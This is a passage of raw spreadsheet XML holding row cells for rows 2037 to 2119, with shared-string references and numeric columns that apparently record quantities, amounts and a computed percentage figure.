      <c r="C2037" s="238" t="s">
        <v>10318</v>
      </c>
      <c r="D2037" s="238" t="s">
        <v>10319</v>
      </c>
      <c r="E2037" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2037" s="238" t="s">
        <v>10320</v>
      </c>
      <c r="G2037" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2037" s="10">
        <v>2</v>
      </c>
      <c r="I2037" s="14">
        <v>34.19</v>
      </c>
      <c r="J2037" s="15">
        <v>5.472</v>
      </c>
      <c r="K2037" s="16"/>
    </row>
    <row r="2038" spans="2:11">
      <c r="B2038" s="9">
        <v>2072</v>
      </c>
      <c r="C2038" s="238" t="s">
        <v>10321</v>
      </c>
      <c r="D2038" s="238" t="s">
        <v>10322</v>
      </c>
      <c r="E2038" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2038" s="238" t="s">
        <v>10323</v>
      </c>
      <c r="G2038" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2038" s="10">
        <v>2</v>
      </c>
      <c r="I2038" s="14">
        <v>30.75</v>
      </c>
      <c r="J2038" s="15">
        <v>4.9216</v>
      </c>
      <c r="K2038" s="16"/>
    </row>
    <row r="2039" spans="2:11">
      <c r="B2039" s="9">
        <v>2073</v>
      </c>
      <c r="C2039" s="238" t="s">
        <v>10324</v>
      </c>
      <c r="D2039" s="238" t="s">
        <v>10325</v>
      </c>
      <c r="E2039" s="238" t="s">
        <v>10326</v>
      </c>
      <c r="F2039" s="238" t="s">
        <v>10327</v>
      </c>
      <c r="G2039" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H2039" s="10">
        <v>10</v>
      </c>
      <c r="I2039" s="14">
        <v>8.67</v>
      </c>
      <c r="J2039" s="15">
        <v>1.392</v>
      </c>
      <c r="K2039" s="16"/>
    </row>
    <row r="2040" spans="2:11">
      <c r="B2040" s="9">
        <v>2074</v>
      </c>
      <c r="C2040" s="238" t="s">
        <v>10328</v>
      </c>
      <c r="D2040" s="238" t="s">
        <v>10329</v>
      </c>
      <c r="E2040" s="238" t="s">
        <v>10326</v>
      </c>
      <c r="F2040" s="238" t="s">
        <v>10330</v>
      </c>
      <c r="G2040" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H2040" s="10">
        <v>5</v>
      </c>
      <c r="I2040" s="14">
        <v>31.49</v>
      </c>
      <c r="J2040" s="15">
        <v>5.04</v>
      </c>
      <c r="K2040" s="16"/>
    </row>
    <row r="2041" spans="2:11">
      <c r="B2041" s="9">
        <v>2075</v>
      </c>
      <c r="C2041" s="238" t="s">
        <v>10331</v>
      </c>
      <c r="D2041" s="238" t="s">
        <v>10332</v>
      </c>
      <c r="E2041" s="238" t="s">
        <v>10333</v>
      </c>
      <c r="F2041" s="9"/>
      <c r="G2041" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2041" s="10">
        <v>3</v>
      </c>
      <c r="I2041" s="14">
        <v>39.24</v>
      </c>
      <c r="J2041" s="15">
        <v>6.2784</v>
      </c>
      <c r="K2041" s="16"/>
    </row>
    <row r="2042" spans="2:11">
      <c r="B2042" s="9">
        <v>2076</v>
      </c>
      <c r="C2042" s="238" t="s">
        <v>10334</v>
      </c>
      <c r="D2042" s="238" t="s">
        <v>7579</v>
      </c>
      <c r="E2042" s="238" t="s">
        <v>10335</v>
      </c>
      <c r="F2042" s="9"/>
      <c r="G2042" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2042" s="10">
        <v>38</v>
      </c>
      <c r="I2042" s="14">
        <v>24.28</v>
      </c>
      <c r="J2042" s="15">
        <v>3.8912</v>
      </c>
      <c r="K2042" s="16"/>
    </row>
    <row r="2043" spans="2:11">
      <c r="B2043" s="9">
        <v>2077</v>
      </c>
      <c r="C2043" s="238" t="s">
        <v>10336</v>
      </c>
      <c r="D2043" s="238" t="s">
        <v>7389</v>
      </c>
      <c r="E2043" s="238" t="s">
        <v>7390</v>
      </c>
      <c r="F2043" s="9"/>
      <c r="G2043" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2043" s="10">
        <v>78</v>
      </c>
      <c r="I2043" s="14">
        <v>440.88</v>
      </c>
      <c r="J2043" s="15">
        <v>70.512</v>
      </c>
      <c r="K2043" s="16"/>
    </row>
    <row r="2044" spans="2:11">
      <c r="B2044" s="9">
        <v>2078</v>
      </c>
      <c r="C2044" s="238" t="s">
        <v>10337</v>
      </c>
      <c r="D2044" s="238" t="s">
        <v>10338</v>
      </c>
      <c r="E2044" s="238" t="s">
        <v>10339</v>
      </c>
      <c r="F2044" s="9"/>
      <c r="G2044" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2044" s="10">
        <v>25</v>
      </c>
      <c r="I2044" s="14">
        <v>447.91</v>
      </c>
      <c r="J2044" s="15">
        <v>71.68</v>
      </c>
      <c r="K2044" s="16"/>
    </row>
    <row r="2045" spans="2:11">
      <c r="B2045" s="9">
        <v>2079</v>
      </c>
      <c r="C2045" s="238" t="s">
        <v>10340</v>
      </c>
      <c r="D2045" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E2045" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2045" s="9"/>
      <c r="G2045" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2045" s="10">
        <v>10</v>
      </c>
      <c r="I2045" s="14">
        <v>442.9</v>
      </c>
      <c r="J2045" s="15">
        <v>70.864</v>
      </c>
      <c r="K2045" s="16"/>
    </row>
    <row r="2046" spans="2:11">
      <c r="B2046" s="9">
        <v>2080</v>
      </c>
      <c r="C2046" s="238" t="s">
        <v>10341</v>
      </c>
      <c r="D2046" s="238" t="s">
        <v>5900</v>
      </c>
      <c r="E2046" s="238" t="s">
        <v>10342</v>
      </c>
      <c r="F2046" s="9"/>
      <c r="G2046" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2046" s="10">
        <v>15</v>
      </c>
      <c r="I2046" s="14">
        <v>5.63</v>
      </c>
      <c r="J2046" s="15">
        <v>0.912</v>
      </c>
      <c r="K2046" s="16"/>
    </row>
    <row r="2047" spans="2:11">
      <c r="B2047" s="9">
        <v>2081</v>
      </c>
      <c r="C2047" s="238" t="s">
        <v>10343</v>
      </c>
      <c r="D2047" s="238" t="s">
        <v>10344</v>
      </c>
      <c r="E2047" s="238" t="s">
        <v>10345</v>
      </c>
      <c r="F2047" s="9"/>
      <c r="G2047" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2047" s="10">
        <v>9</v>
      </c>
      <c r="I2047" s="14">
        <v>27.92</v>
      </c>
      <c r="J2047" s="15">
        <v>4.464</v>
      </c>
      <c r="K2047" s="16"/>
    </row>
    <row r="2048" spans="2:11">
      <c r="B2048" s="9">
        <v>2082</v>
      </c>
      <c r="C2048" s="238" t="s">
        <v>10346</v>
      </c>
      <c r="D2048" s="238" t="s">
        <v>10347</v>
      </c>
      <c r="E2048" s="238" t="s">
        <v>10348</v>
      </c>
      <c r="F2048" s="9"/>
      <c r="G2048" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2048" s="10">
        <v>30</v>
      </c>
      <c r="I2048" s="14">
        <v>600</v>
      </c>
      <c r="J2048" s="15">
        <v>96</v>
      </c>
      <c r="K2048" s="16"/>
    </row>
    <row r="2049" spans="2:11">
      <c r="B2049" s="9">
        <v>2083</v>
      </c>
      <c r="C2049" s="238" t="s">
        <v>10349</v>
      </c>
      <c r="D2049" s="238" t="s">
        <v>10350</v>
      </c>
      <c r="E2049" s="238" t="s">
        <v>10351</v>
      </c>
      <c r="F2049" s="9"/>
      <c r="G2049" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2049" s="10">
        <v>9</v>
      </c>
      <c r="I2049" s="14">
        <v>60.34</v>
      </c>
      <c r="J2049" s="15">
        <v>9.648</v>
      </c>
      <c r="K2049" s="16"/>
    </row>
    <row r="2050" spans="2:11">
      <c r="B2050" s="9">
        <v>2084</v>
      </c>
      <c r="C2050" s="238" t="s">
        <v>10352</v>
      </c>
      <c r="D2050" s="238" t="s">
        <v>10353</v>
      </c>
      <c r="E2050" s="238" t="s">
        <v>10354</v>
      </c>
      <c r="F2050" s="238" t="s">
        <v>6305</v>
      </c>
      <c r="G2050" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2050" s="10">
        <v>1</v>
      </c>
      <c r="I2050" s="14">
        <v>58.12</v>
      </c>
      <c r="J2050" s="15">
        <v>9.2992</v>
      </c>
      <c r="K2050" s="16"/>
    </row>
    <row r="2051" spans="2:11">
      <c r="B2051" s="9">
        <v>2085</v>
      </c>
      <c r="C2051" s="238" t="s">
        <v>10355</v>
      </c>
      <c r="D2051" s="238" t="s">
        <v>10356</v>
      </c>
      <c r="E2051" s="238" t="s">
        <v>10357</v>
      </c>
      <c r="F2051" s="9"/>
      <c r="G2051" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2051" s="10">
        <v>2</v>
      </c>
      <c r="I2051" s="14">
        <v>271.36</v>
      </c>
      <c r="J2051" s="15">
        <v>43.4176</v>
      </c>
      <c r="K2051" s="16"/>
    </row>
    <row r="2052" spans="2:11">
      <c r="B2052" s="9">
        <v>2086</v>
      </c>
      <c r="C2052" s="238" t="s">
        <v>10358</v>
      </c>
      <c r="D2052" s="238" t="s">
        <v>4788</v>
      </c>
      <c r="E2052" s="238" t="s">
        <v>4624</v>
      </c>
      <c r="F2052" s="9"/>
      <c r="G2052" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2052" s="10">
        <v>8</v>
      </c>
      <c r="I2052" s="14">
        <v>102.57</v>
      </c>
      <c r="J2052" s="15">
        <v>16.4096</v>
      </c>
      <c r="K2052" s="16"/>
    </row>
    <row r="2053" spans="2:11">
      <c r="B2053" s="9">
        <v>2087</v>
      </c>
      <c r="C2053" s="238" t="s">
        <v>10359</v>
      </c>
      <c r="D2053" s="238" t="s">
        <v>10360</v>
      </c>
      <c r="E2053" s="238" t="s">
        <v>10361</v>
      </c>
      <c r="F2053" s="9"/>
      <c r="G2053" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2053" s="10">
        <v>5</v>
      </c>
      <c r="I2053" s="14">
        <v>500</v>
      </c>
      <c r="J2053" s="15">
        <v>80</v>
      </c>
      <c r="K2053" s="16"/>
    </row>
    <row r="2054" spans="2:11">
      <c r="B2054" s="9">
        <v>2088</v>
      </c>
      <c r="C2054" s="238" t="s">
        <v>10362</v>
      </c>
      <c r="D2054" s="238" t="s">
        <v>10363</v>
      </c>
      <c r="E2054" s="238" t="s">
        <v>5269</v>
      </c>
      <c r="F2054" s="9"/>
      <c r="G2054" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2054" s="10">
        <v>76</v>
      </c>
      <c r="I2054" s="14">
        <v>119.8</v>
      </c>
      <c r="J2054" s="15">
        <v>19.2128</v>
      </c>
      <c r="K2054" s="16"/>
    </row>
    <row r="2055" spans="2:11">
      <c r="B2055" s="9">
        <v>2089</v>
      </c>
      <c r="C2055" s="238" t="s">
        <v>10364</v>
      </c>
      <c r="D2055" s="238" t="s">
        <v>10365</v>
      </c>
      <c r="E2055" s="238" t="s">
        <v>10366</v>
      </c>
      <c r="F2055" s="9"/>
      <c r="G2055" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2055" s="10">
        <v>25</v>
      </c>
      <c r="I2055" s="14">
        <v>23.08</v>
      </c>
      <c r="J2055" s="15">
        <v>3.68</v>
      </c>
      <c r="K2055" s="16"/>
    </row>
    <row r="2056" spans="2:11">
      <c r="B2056" s="9">
        <v>2090</v>
      </c>
      <c r="C2056" s="238" t="s">
        <v>10367</v>
      </c>
      <c r="D2056" s="238" t="s">
        <v>10368</v>
      </c>
      <c r="E2056" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2056" s="9"/>
      <c r="G2056" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2056" s="10">
        <v>41</v>
      </c>
      <c r="I2056" s="14">
        <v>516.37</v>
      </c>
      <c r="J2056" s="15">
        <v>82.5904</v>
      </c>
      <c r="K2056" s="16"/>
    </row>
    <row r="2057" spans="2:11">
      <c r="B2057" s="9">
        <v>2091</v>
      </c>
      <c r="C2057" s="238" t="s">
        <v>10370</v>
      </c>
      <c r="D2057" s="238" t="s">
        <v>10371</v>
      </c>
      <c r="E2057" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2057" s="238" t="s">
        <v>10372</v>
      </c>
      <c r="G2057" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2057" s="10">
        <v>9</v>
      </c>
      <c r="I2057" s="14">
        <v>269.23</v>
      </c>
      <c r="J2057" s="15">
        <v>43.0704</v>
      </c>
      <c r="K2057" s="16"/>
    </row>
    <row r="2058" spans="2:11">
      <c r="B2058" s="9">
        <v>2092</v>
      </c>
      <c r="C2058" s="238" t="s">
        <v>10373</v>
      </c>
      <c r="D2058" s="238" t="s">
        <v>10374</v>
      </c>
      <c r="E2058" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2058" s="238" t="s">
        <v>10375</v>
      </c>
      <c r="G2058" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2058" s="10">
        <v>22</v>
      </c>
      <c r="I2058" s="14">
        <v>378.44</v>
      </c>
      <c r="J2058" s="15">
        <v>60.544</v>
      </c>
      <c r="K2058" s="16"/>
    </row>
    <row r="2059" spans="2:11">
      <c r="B2059" s="9">
        <v>2093</v>
      </c>
      <c r="C2059" s="238" t="s">
        <v>10376</v>
      </c>
      <c r="D2059" s="238" t="s">
        <v>10377</v>
      </c>
      <c r="E2059" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2059" s="238" t="s">
        <v>10378</v>
      </c>
      <c r="G2059" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2059" s="10">
        <v>2</v>
      </c>
      <c r="I2059" s="14">
        <v>21.76</v>
      </c>
      <c r="J2059" s="15">
        <v>3.4816</v>
      </c>
      <c r="K2059" s="16"/>
    </row>
    <row r="2060" spans="2:11">
      <c r="B2060" s="9">
        <v>2094</v>
      </c>
      <c r="C2060" s="238" t="s">
        <v>10379</v>
      </c>
      <c r="D2060" s="238" t="s">
        <v>10380</v>
      </c>
      <c r="E2060" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2060" s="238" t="s">
        <v>10381</v>
      </c>
      <c r="G2060" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2060" s="10">
        <v>7</v>
      </c>
      <c r="I2060" s="14">
        <v>72.55</v>
      </c>
      <c r="J2060" s="15">
        <v>11.6032</v>
      </c>
      <c r="K2060" s="16"/>
    </row>
    <row r="2061" spans="2:11">
      <c r="B2061" s="9">
        <v>2095</v>
      </c>
      <c r="C2061" s="238" t="s">
        <v>10382</v>
      </c>
      <c r="D2061" s="238" t="s">
        <v>10383</v>
      </c>
      <c r="E2061" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2061" s="238" t="s">
        <v>10384</v>
      </c>
      <c r="G2061" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2061" s="10">
        <v>26</v>
      </c>
      <c r="I2061" s="14">
        <v>292.38</v>
      </c>
      <c r="J2061" s="15">
        <v>46.8</v>
      </c>
      <c r="K2061" s="16"/>
    </row>
    <row r="2062" spans="2:11">
      <c r="B2062" s="9">
        <v>2096</v>
      </c>
      <c r="C2062" s="238" t="s">
        <v>10385</v>
      </c>
      <c r="D2062" s="238" t="s">
        <v>10386</v>
      </c>
      <c r="E2062" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2062" s="238" t="s">
        <v>10387</v>
      </c>
      <c r="G2062" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2062" s="10">
        <v>36</v>
      </c>
      <c r="I2062" s="14">
        <v>631.5</v>
      </c>
      <c r="J2062" s="15">
        <v>101.0304</v>
      </c>
      <c r="K2062" s="16"/>
    </row>
    <row r="2063" spans="2:11">
      <c r="B2063" s="9">
        <v>2097</v>
      </c>
      <c r="C2063" s="238" t="s">
        <v>10388</v>
      </c>
      <c r="D2063" s="238" t="s">
        <v>10389</v>
      </c>
      <c r="E2063" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2063" s="238" t="s">
        <v>10390</v>
      </c>
      <c r="G2063" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2063" s="10">
        <v>5</v>
      </c>
      <c r="I2063" s="14">
        <v>96.86</v>
      </c>
      <c r="J2063" s="15">
        <v>15.496</v>
      </c>
      <c r="K2063" s="16"/>
    </row>
    <row r="2064" spans="2:11">
      <c r="B2064" s="9">
        <v>2098</v>
      </c>
      <c r="C2064" s="238" t="s">
        <v>10391</v>
      </c>
      <c r="D2064" s="238" t="s">
        <v>10392</v>
      </c>
      <c r="E2064" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2064" s="238" t="s">
        <v>10393</v>
      </c>
      <c r="G2064" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2064" s="10">
        <v>4</v>
      </c>
      <c r="I2064" s="14">
        <v>93.98</v>
      </c>
      <c r="J2064" s="15">
        <v>15.04</v>
      </c>
      <c r="K2064" s="16"/>
    </row>
    <row r="2065" spans="2:11">
      <c r="B2065" s="9">
        <v>2099</v>
      </c>
      <c r="C2065" s="238" t="s">
        <v>10394</v>
      </c>
      <c r="D2065" s="238" t="s">
        <v>10395</v>
      </c>
      <c r="E2065" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2065" s="238" t="s">
        <v>10396</v>
      </c>
      <c r="G2065" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2065" s="10">
        <v>20</v>
      </c>
      <c r="I2065" s="14">
        <v>931.63</v>
      </c>
      <c r="J2065" s="15">
        <v>149.056</v>
      </c>
      <c r="K2065" s="16"/>
    </row>
    <row r="2066" spans="2:11">
      <c r="B2066" s="9">
        <v>2100</v>
      </c>
      <c r="C2066" s="238" t="s">
        <v>10397</v>
      </c>
      <c r="D2066" s="238" t="s">
        <v>10398</v>
      </c>
      <c r="E2066" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2066" s="238" t="s">
        <v>10399</v>
      </c>
      <c r="G2066" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2066" s="10">
        <v>6</v>
      </c>
      <c r="I2066" s="14">
        <v>543.59</v>
      </c>
      <c r="J2066" s="15">
        <v>86.976</v>
      </c>
      <c r="K2066" s="16"/>
    </row>
    <row r="2067" spans="2:11">
      <c r="B2067" s="9">
        <v>2101</v>
      </c>
      <c r="C2067" s="238" t="s">
        <v>10400</v>
      </c>
      <c r="D2067" s="238" t="s">
        <v>10401</v>
      </c>
      <c r="E2067" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2067" s="238" t="s">
        <v>10402</v>
      </c>
      <c r="G2067" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2067" s="10">
        <v>3</v>
      </c>
      <c r="I2067" s="14">
        <v>891</v>
      </c>
      <c r="J2067" s="15">
        <v>142.56</v>
      </c>
      <c r="K2067" s="16"/>
    </row>
    <row r="2068" spans="2:11">
      <c r="B2068" s="9">
        <v>2102</v>
      </c>
      <c r="C2068" s="238" t="s">
        <v>10403</v>
      </c>
      <c r="D2068" s="238" t="s">
        <v>10368</v>
      </c>
      <c r="E2068" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2068" s="238" t="s">
        <v>10404</v>
      </c>
      <c r="G2068" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2068" s="10">
        <v>8</v>
      </c>
      <c r="I2068" s="14">
        <v>3282.05</v>
      </c>
      <c r="J2068" s="15">
        <v>525.1328</v>
      </c>
      <c r="K2068" s="16"/>
    </row>
    <row r="2069" spans="2:11">
      <c r="B2069" s="9">
        <v>2103</v>
      </c>
      <c r="C2069" s="238" t="s">
        <v>10405</v>
      </c>
      <c r="D2069" s="238" t="s">
        <v>10368</v>
      </c>
      <c r="E2069" s="238" t="s">
        <v>10369</v>
      </c>
      <c r="F2069" s="238" t="s">
        <v>10406</v>
      </c>
      <c r="G2069" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2069" s="10">
        <v>2</v>
      </c>
      <c r="I2069" s="14">
        <v>190</v>
      </c>
      <c r="J2069" s="15">
        <v>30.4</v>
      </c>
      <c r="K2069" s="16"/>
    </row>
    <row r="2070" spans="2:11">
      <c r="B2070" s="9">
        <v>2104</v>
      </c>
      <c r="C2070" s="238" t="s">
        <v>10407</v>
      </c>
      <c r="D2070" s="238" t="s">
        <v>10408</v>
      </c>
      <c r="E2070" s="238" t="s">
        <v>10409</v>
      </c>
      <c r="F2070" s="9"/>
      <c r="G2070" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2070" s="10">
        <v>2</v>
      </c>
      <c r="I2070" s="14">
        <v>90</v>
      </c>
      <c r="J2070" s="15">
        <v>14.4</v>
      </c>
      <c r="K2070" s="16"/>
    </row>
    <row r="2071" spans="2:11">
      <c r="B2071" s="9">
        <v>2105</v>
      </c>
      <c r="C2071" s="238" t="s">
        <v>10410</v>
      </c>
      <c r="D2071" s="238" t="s">
        <v>10411</v>
      </c>
      <c r="E2071" s="238" t="s">
        <v>10412</v>
      </c>
      <c r="F2071" s="238" t="s">
        <v>10413</v>
      </c>
      <c r="G2071" s="237" t="s">
        <v>10414</v>
      </c>
      <c r="H2071" s="10">
        <v>2</v>
      </c>
      <c r="I2071" s="14">
        <v>687.57</v>
      </c>
      <c r="J2071" s="15">
        <v>110.0128</v>
      </c>
      <c r="K2071" s="16"/>
    </row>
    <row r="2072" spans="2:11">
      <c r="B2072" s="9">
        <v>2106</v>
      </c>
      <c r="C2072" s="238" t="s">
        <v>10415</v>
      </c>
      <c r="D2072" s="238" t="s">
        <v>10416</v>
      </c>
      <c r="E2072" s="238" t="s">
        <v>10417</v>
      </c>
      <c r="F2072" s="238" t="s">
        <v>10418</v>
      </c>
      <c r="G2072" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2072" s="10">
        <v>3</v>
      </c>
      <c r="I2072" s="14">
        <v>11025.64</v>
      </c>
      <c r="J2072" s="15">
        <v>1764.1008</v>
      </c>
      <c r="K2072" s="16"/>
    </row>
    <row r="2073" spans="2:11">
      <c r="B2073" s="9">
        <v>2107</v>
      </c>
      <c r="C2073" s="238" t="s">
        <v>10419</v>
      </c>
      <c r="D2073" s="238" t="s">
        <v>10420</v>
      </c>
      <c r="E2073" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2073" s="238" t="s">
        <v>5904</v>
      </c>
      <c r="G2073" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2073" s="10">
        <v>5</v>
      </c>
      <c r="I2073" s="14">
        <v>5555.56</v>
      </c>
      <c r="J2073" s="15">
        <v>888.888</v>
      </c>
      <c r="K2073" s="16"/>
    </row>
    <row r="2074" spans="2:11">
      <c r="B2074" s="9">
        <v>2108</v>
      </c>
      <c r="C2074" s="238" t="s">
        <v>10421</v>
      </c>
      <c r="D2074" s="238" t="s">
        <v>10422</v>
      </c>
      <c r="E2074" s="238" t="s">
        <v>2865</v>
      </c>
      <c r="F2074" s="238" t="s">
        <v>10423</v>
      </c>
      <c r="G2074" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2074" s="10">
        <v>1</v>
      </c>
      <c r="I2074" s="14">
        <v>311.97</v>
      </c>
      <c r="J2074" s="15">
        <v>49.9152</v>
      </c>
      <c r="K2074" s="16"/>
    </row>
    <row r="2075" spans="2:11">
      <c r="B2075" s="9">
        <v>2109</v>
      </c>
      <c r="C2075" s="238" t="s">
        <v>10424</v>
      </c>
      <c r="D2075" s="238" t="s">
        <v>10425</v>
      </c>
      <c r="E2075" s="238" t="s">
        <v>10426</v>
      </c>
      <c r="F2075" s="238" t="s">
        <v>10427</v>
      </c>
      <c r="G2075" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2075" s="10">
        <v>1</v>
      </c>
      <c r="I2075" s="14">
        <v>9401.71</v>
      </c>
      <c r="J2075" s="15">
        <v>1504.2736</v>
      </c>
      <c r="K2075" s="16"/>
    </row>
    <row r="2076" spans="2:11">
      <c r="B2076" s="9">
        <v>2110</v>
      </c>
      <c r="C2076" s="238" t="s">
        <v>10428</v>
      </c>
      <c r="D2076" s="238" t="s">
        <v>9116</v>
      </c>
      <c r="E2076" s="238" t="s">
        <v>867</v>
      </c>
      <c r="F2076" s="9"/>
      <c r="G2076" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2076" s="10">
        <v>1</v>
      </c>
      <c r="I2076" s="14">
        <v>1282.05</v>
      </c>
      <c r="J2076" s="15">
        <v>205.128</v>
      </c>
      <c r="K2076" s="16"/>
    </row>
    <row r="2077" spans="2:11">
      <c r="B2077" s="9">
        <v>2111</v>
      </c>
      <c r="C2077" s="238" t="s">
        <v>10429</v>
      </c>
      <c r="D2077" s="238" t="s">
        <v>10430</v>
      </c>
      <c r="E2077" s="238" t="s">
        <v>10431</v>
      </c>
      <c r="F2077" s="238" t="s">
        <v>422</v>
      </c>
      <c r="G2077" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2077" s="10">
        <v>1</v>
      </c>
      <c r="I2077" s="14">
        <v>734.67</v>
      </c>
      <c r="J2077" s="15">
        <v>117.5472</v>
      </c>
      <c r="K2077" s="16"/>
    </row>
    <row r="2078" spans="2:11">
      <c r="B2078" s="9">
        <v>2112</v>
      </c>
      <c r="C2078" s="238" t="s">
        <v>10432</v>
      </c>
      <c r="D2078" s="238" t="s">
        <v>10433</v>
      </c>
      <c r="E2078" s="238" t="s">
        <v>10434</v>
      </c>
      <c r="F2078" s="9"/>
      <c r="G2078" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2078" s="10">
        <v>1</v>
      </c>
      <c r="I2078" s="14">
        <v>5726.5</v>
      </c>
      <c r="J2078" s="15">
        <v>916.24</v>
      </c>
      <c r="K2078" s="16"/>
    </row>
    <row r="2079" spans="2:11">
      <c r="B2079" s="9">
        <v>2113</v>
      </c>
      <c r="C2079" s="238" t="s">
        <v>10435</v>
      </c>
      <c r="D2079" s="238" t="s">
        <v>10436</v>
      </c>
      <c r="E2079" s="238" t="s">
        <v>10437</v>
      </c>
      <c r="F2079" s="9"/>
      <c r="G2079" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2079" s="10">
        <v>1</v>
      </c>
      <c r="I2079" s="14">
        <v>4786.32</v>
      </c>
      <c r="J2079" s="15">
        <v>765.8112</v>
      </c>
      <c r="K2079" s="16"/>
    </row>
    <row r="2080" spans="2:11">
      <c r="B2080" s="9">
        <v>2114</v>
      </c>
      <c r="C2080" s="238" t="s">
        <v>10438</v>
      </c>
      <c r="D2080" s="238" t="s">
        <v>6718</v>
      </c>
      <c r="E2080" s="238" t="s">
        <v>6719</v>
      </c>
      <c r="F2080" s="9"/>
      <c r="G2080" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2080" s="10">
        <v>1</v>
      </c>
      <c r="I2080" s="14">
        <v>1367.52</v>
      </c>
      <c r="J2080" s="15">
        <v>218.8032</v>
      </c>
      <c r="K2080" s="16"/>
    </row>
    <row r="2081" spans="2:11">
      <c r="B2081" s="9">
        <v>2115</v>
      </c>
      <c r="C2081" s="238" t="s">
        <v>10439</v>
      </c>
      <c r="D2081" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E2081" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2081" s="9"/>
      <c r="G2081" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2081" s="10">
        <v>62</v>
      </c>
      <c r="I2081" s="14">
        <v>4062.3</v>
      </c>
      <c r="J2081" s="15">
        <v>649.9584</v>
      </c>
      <c r="K2081" s="16"/>
    </row>
    <row r="2082" spans="2:11">
      <c r="B2082" s="9">
        <v>2116</v>
      </c>
      <c r="C2082" s="238" t="s">
        <v>10440</v>
      </c>
      <c r="D2082" s="238" t="s">
        <v>10441</v>
      </c>
      <c r="E2082" s="238" t="s">
        <v>10442</v>
      </c>
      <c r="F2082" s="238" t="s">
        <v>10443</v>
      </c>
      <c r="G2082" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2082" s="10">
        <v>2</v>
      </c>
      <c r="I2082" s="14">
        <v>1245</v>
      </c>
      <c r="J2082" s="15">
        <v>199.2</v>
      </c>
      <c r="K2082" s="16"/>
    </row>
    <row r="2083" spans="2:11">
      <c r="B2083" s="9">
        <v>2117</v>
      </c>
      <c r="C2083" s="238" t="s">
        <v>10444</v>
      </c>
      <c r="D2083" s="238" t="s">
        <v>10445</v>
      </c>
      <c r="E2083" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F2083" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2083" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2083" s="10">
        <v>1</v>
      </c>
      <c r="I2083" s="14">
        <v>315.3</v>
      </c>
      <c r="J2083" s="15">
        <v>50.448</v>
      </c>
      <c r="K2083" s="16"/>
    </row>
    <row r="2084" spans="2:11">
      <c r="B2084" s="9">
        <v>2118</v>
      </c>
      <c r="C2084" s="238" t="s">
        <v>10447</v>
      </c>
      <c r="D2084" s="238" t="s">
        <v>10448</v>
      </c>
      <c r="E2084" s="238" t="s">
        <v>5001</v>
      </c>
      <c r="F2084" s="238" t="s">
        <v>10446</v>
      </c>
      <c r="G2084" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2084" s="10">
        <v>7</v>
      </c>
      <c r="I2084" s="14">
        <v>434.24</v>
      </c>
      <c r="J2084" s="15">
        <v>69.4736</v>
      </c>
      <c r="K2084" s="16"/>
    </row>
    <row r="2085" spans="2:11">
      <c r="B2085" s="9">
        <v>2119</v>
      </c>
      <c r="C2085" s="238" t="s">
        <v>10449</v>
      </c>
